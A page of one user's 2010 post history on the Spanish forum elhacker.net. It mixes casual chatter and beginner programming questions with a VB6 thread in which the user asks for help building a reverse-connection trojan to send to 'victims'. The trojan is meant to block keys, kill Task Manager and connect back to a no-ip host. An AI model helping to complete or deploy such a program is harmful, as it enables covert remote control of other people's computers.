elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 ... 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 [122] 123 124 125 126 127
1211  Foros Generales / Foro Libre / Re: Mantener la respiración. en: 15 Octubre 2010, 15:20 pm
Acabo de probar y tengo 18 años y demore 1 y medio pero creo q si pruebo otras veces llegaria a mas de 2
1212  Foros Generales / Foro Libre / Re: Nuevo virus !!!! en: 15 Octubre 2010, 15:15 pm
A mi me llego hace un rato un correo de "facebook.varioscaracteres.ru" con una "actualización de facebook que me hacia premium y permitía ver los perfiles de cualquiera y administrar cualquier cuenta sólo instalando facebookUpdate.exe" xD
 
Obviamente lo instale y ahora soy admin de facebook ja ja ja
 
No es por nada pero sí alguien cae por ejemplo en el que menciono creo que se lo tiene bien merecido no?

Se lo tendria merecido si xD
1213  Seguridad Informática / Análisis y Diseño de Malware / Re: Porque algunos virus o troyanos no funcionan en otros SO? en: 12 Octubre 2010, 17:46 pm
Entonces respondeme algo... porque todavia las apis de windows95 funcionan?

Jajaja xD, yo no entiendo nada pero aprendo de sus discuciones continuen porfavor... xD
1214  Seguridad Informática / Hacking / Re: (VIDEOTUTORIAL HABLADO) Metasploit Exploit Netapi + NMAP en: 7 Octubre 2010, 18:38 pm
Es para usar en red lan o q? no entendi bien
1215  Programación / Programación General / Preguntas estupid** contestar porfavor en: 5 Octubre 2010, 23:40 pm
Si las contestan por numero me gustaria mas xD

1- Existen varios lenguajes de programacion por ejemplo C++, ¿dentro de 10 años el lenguaje sera el mismo no?, ¿Se usaran los mismos Compiladores o IDEs? Porque por ejemplo Visual Basic 6 paso a ser .net y cambio el lenguaje y IDE :S

2- ¿Que IDE usan para C++? Uso DevC++ para codear estilo Batch y para C++ grafico uso C++ Builder 6, ¿Esta bien?

3- Aprendi Visual Basic 6, pero resulta q en las universidades enseñan VB.NET para trabajar con Base de Datos y por ser un lenguaje mas orientado a objetos( q por ahora no se q mier** es o porq tanto lio con eso xD, si en VB 6 se usan clases y colleciones q creo q es para eso.. :S), ¿Me corto los huev** o me sera facil aprender .NET ya sabiendo bastante bien VB 6?

4- ¿Alguno que vaya a universidad les enseñan Pascal? ¿Pascal no es Delphi o porque no lo he escuchado mucho al nombre Pascal?

5- Mire por ahi q hay muchas ramas de Ingeniero de Sistema, y yo tomare la de Analista Programador, pero.. ¿aprendere cosas como armar pc, redes y eso a la vez?

6- Aqui contesta lo q no sea nada de esas preguntas, muchas gracias!
1216  Programación / Programación Visual Basic / Re: Como creo la conexion con CSocket Master? en: 5 Octubre 2010, 22:44 pm
Hice eso q dijiste y no ha funcionado, pero talvez por el q me testea si anda tiene xp sp3, y yo tengo sp2 no se..
1217  Programación / Programación Visual Basic / Re: Como creo la conexion con CSocket Master? en: 5 Octubre 2010, 17:09 pm
Bueno se q me van a decir q no puedo hacer q me hagan las cosas sino no aprendo nada, pero aca les dejo:

http://www.megaupload.com/?d=W9YB6HPW

Si me solucionan la conexion para hacerlo pc a pc remota les agradezco, pero si tenia un error me podrian explicar porq sino si no aprendo nada :/

Aclaraciones: Lean el code si desconfian primero ( ya se que lo haran xD) pero digo porq el servidor va para mis victimas del spynet o talvez luego le hago otras cosas para enviarlo y q cree entrada en el registro, y... en el form load bloquea la tecla Windows, el Tab, la mayusucula y si abres el administrador de tareas se cierra, pero si cierran el programa desde la cruz "x" cosa de q llame al evento form_unload, vuelve todo a la normalidad.

Eso si, yo tengo windows xp sp2, no se si andara igual en otros SO :S pero espero q si o sino me dicen ;)

Edit: Recien mire lo q subi a megaupload y el servidor esta configurado para q se conecte a server.localip, asique asi anda pero solo en la misma pc ( ejecutando los 2) pero habria q cambiar el server.localip por "xxxzeroxxx.no-ip.org" ( pero ustedes haran las pruebas con su ip o  su no-ip XD)

No creo q me ayuden xD pero si por ahi alguien se aburre y me ayuda talvez en el form_load del servidor me hacen algun bucle para q intente conectarse siempre, asi funcionaria como un troyano de conexion inversa, q son cositas q les pondre desp xD
1218  Programación / Programación Visual Basic / Re: Como creo la conexion con CSocket Master? en: 4 Octubre 2010, 20:39 pm
Nadie me ayuda?
1219  Programación / Programación Visual Basic / Re: Como creo la conexion con CSocket Master? en: 4 Octubre 2010, 01:09 am
mmm...

Ya vi los ejemplos, pero por ejemplo el chat q es lo q me interesa, esta el server y el cliente en un mismo proyecto :S , y usa cliente.localip, puerto , y eso me suena a q funciona solo en la misma pc xD, a ver si alguien sabe..

Y uso CSocketMaster para no depender de la ocx, podria llevarla como recurso pero ya es mas lio, es mas facil con winshock lo se, pero me han recomendado csocketmaster por eso
1220  Programación / Programación Visual Basic / Como creo la conexion con CSocket Master? en: 3 Octubre 2010, 18:41 pm
Bueno, eso mismo.. necesito crear una conexion simple y no puedo :S, declaro bien las variables y todo, solo me faltaria q me digan cuales comandos usar o en q orden:

server.bind , server.localport, o remoteport no se cual va porq usando la logica no me anda :S

Despues para conectarse es mas simple creo pero no se si esto esta bien

cliente.connect "hydbah.no-ip.org" , "5555"

por ejemplo.. Y esta actualizado el no-ip si, a ver quien me lo soluciona q ya lo hice una vez si pero perdi el proyecto y no me acuerdo ahora :S, desp de la conexion para fijarme si se conecto uso el evento server_connect() no?
Páginas: 1 ... 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 [122] 123 124 125 126 127
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines